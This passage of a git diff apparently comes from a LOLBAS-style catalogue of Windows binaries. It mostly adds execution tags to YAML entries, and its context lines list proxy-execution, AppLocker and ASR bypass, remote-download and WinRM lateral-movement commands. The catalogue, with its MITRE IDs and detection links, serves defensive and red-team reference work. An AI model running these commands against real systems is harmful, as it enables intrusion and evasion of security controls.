+ Tags: + - Execute: XSL + - Execute: Remote - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system @@ -40,7 +50,8 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: XSL + - Execute: Remote - Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe" Description: Copy file from source to destination. Usecase: Copy file. diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index ef8045c9e..d2dd19a88 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 549b60965..f7fbc3cc9 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: COM - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: COM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 7bfe43d66..b6204bf04 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -27,6 +27,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index 83f76cda7..57a163a75 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -11,6 +11,8 @@ Commands: Privileges: Low privileges MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index 7b54dacdc..b83e0e7ed 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index b09f76a07..f445a41a6 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. @@ -19,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32.exe advpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. @@ -36,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. @@ -43,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\advpack.dll - Path: c:\windows\syswow64\advpack.dll diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml index 163badf06..935a6f567 100644 --- a/yml/OSLibraries/Desk.yml +++ b/yml/OSLibraries/Desk.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. @@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 36fd9d9a5..3796255a3 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: ClickOnce + - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5b745646d..bda0f4cb9 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. @@ -34,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. @@ -41,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 5bcb8b4c1..e75c0a688 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: URL Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 576dd0971..a7701fe92 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA Full_Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 61fd91960..407d41c54 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index e5b6ccc24..b6836b624 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Usecase: Load an executable payload. @@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows Tags: - - Input: INF + - Execute: INF Full_Path: - Path: c:\windows\system32\setupapi.dll - Path: c:\windows\syswow64\setupapi.dll diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index e7ab9a087..52e973e9b 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: URL Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 97e10ab8e..48488674d 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -20,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. @@ -27,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index ac5cce271..3b01659c0 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. @@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF Full_Path: - Path: c:\windows\system32\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 8e7a0702f..608f69d35 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. Usecase: Load an executable payload by calling a .url file with or without quotes. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: URL - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe Description: Launch an executable by calling FileProtocolHandler. Usecase: Launch an executable. @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). @@ -39,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. Usecase: Invoke an HTML Application via mshta.exe (Default Handler). @@ -46,6 +56,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA Full_Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index e107b5e6d..a7c1355db 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). Usecase: Launch an executable. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 4298de424..a57f1b994 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: DLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Code_Sample: diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 37099e571..b23da74c9 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index c7b884d24..963cf0ba9 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 diff --git a/yml/OSScripts/Launch-VsDevShell.yml b/yml/OSScripts/Launch-VsDevShell.yml index d5bb9b2a0..72d32fb04 100644 --- a/yml/OSScripts/Launch-VsDevShell.yml +++ b/yml/OSScripts/Launch-VsDevShell.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: 'powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsInstallationPath "/../../../../../; calc.exe ;"' Description: Execute binaries and commands from the context of the signed script using the "VsInstallationPath" flag. Usecase: Proxy execution @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1 diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index cf3c4b7f5..4b1441c1e 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. Usecase: Proxy execution from script @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\manage-bde.wsf Code_Sample: diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index d913b862f..18985ac4c 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216.001 OperatingSystem: Windows 10 + Tags: + - Execute: SCT Full_Path: - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 64ef7b93f..7f71efb73 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216.002 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs Detection: diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 26109da68..cb86feb91 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: DLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Code_Sample: diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index ecfee7e29..7e375cc0d 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution @@ -18,6 +21,9 @@ Commands: Privileges: Admin MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty' Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe. Usecase: Execute arbitrary, unsigned code via XSL script @@ -25,6 +31,8 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: XSL Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 237afa951..c8b1d9f59 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: Pester.bat ;calc.exe Description: Execute code using Pester. Example here executes calc.exe Usecase: Proxy execution @@ -18,13 +20,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10, Windows 11 - - Command: Pester.bat ;calc.exe - Description: Execute code using Pester. Example here executes calc.exe - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat Code_Sample: diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index be527dad5..23154c192 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: DLL + - Execute: DLL (.NET) - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: DLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 006c8b4d0..142ad7a7c 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -18,6 +18,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: All Windows + Tags: + - Execute: CMD - Command: adplus.exe -c config-adplus.xml Description: Dump process memory using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary @@ -32,6 +34,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: All windows + Tags: + - Execute: CMD + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 8bb87dc51..5e95bac2b 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: PowerShell - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Appcert.yml b/yml/OtherMSBinaries/Appcert.yml index 30b817ba9..a423ff30e 100644 --- a/yml/OtherMSBinaries/Appcert.yml +++ b/yml/OtherMSBinaries/Appcert.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process. Usecase: Execute custom made MSI file with malicious code @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218.007 OperatingSystem: Windows + Tags: + - Execute: MSI Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\App Certification Kit\appcert.exe - Path: C:\Program Files\Windows Kits\10\App Certification Kit\appcert.exe diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index 54678dbd1..620916d6d 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: CMD - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: EXE - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 386361e1f..c61401a86 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -49,6 +49,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH + - Execute: Remote - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. @@ -58,6 +59,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH + - Execute: Remote Full_Path: - Path: no default Detection: diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 290e847cf..87aa504e8 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: Shellcode - Command: | cdb.exe -pd -pn .shell @@ -20,6 +22,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CMD - Command: cdb.exe -c C:\debug-script.txt calc Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary @@ -27,6 +31,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index 